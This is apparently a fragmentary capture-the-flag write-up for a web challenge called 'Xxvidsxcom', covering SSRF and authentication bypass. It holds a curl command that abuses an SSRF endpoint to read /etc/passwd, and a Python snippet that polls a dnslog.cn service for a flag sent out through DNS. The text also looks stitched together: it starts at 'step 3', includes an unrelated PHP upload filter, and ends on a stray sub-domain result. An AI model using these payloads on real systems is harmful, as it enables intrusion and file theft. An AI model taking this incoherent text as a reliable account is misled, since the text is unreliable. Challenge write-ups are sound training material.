2021 — Xxvidsxcom
| Item | Description |
|------|-------------|
| | xxvidsxcom |
| Category | Web – Information Disclosure / SSRF / Authentication Bypass |
| Points | 250 – 400 (varies by event) |
| Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). |
| Typical entry point | A public website that offers video streaming / user‑generated content. |
The source code of the main page revealed a hidden path: `/internal/admin/dashboard`. It is not reachable from the internet, but we can ask the SSRF to fetch it.
```php
<?php
// Server-side upload filter: allow only mp4, avi and mov extensions.
// $ext is assumed to hold the extension of the uploaded file name,
// computed earlier in the upload handler (not shown on this page).
$allowed = array('mp4', 'avi', 'mov');
if (!in_array($ext, $allowed)) {
    die('Invalid file type');
}
```
```python
import time
import requests

# 3️⃣ Wait a few seconds and pull the DNS log
time.sleep(5)
log = requests.get("https://dnslog.cn/api/getrecords")
print("[*] DNS log response:")
print(log.text)  # should contain the flag
```
```console
$ curl -s "https://xxvidsx.com/api/v1/resolve?url=file:///etc/passwd"
"status":200
```
Result: No additional sub‑domains (typical for a small challenge).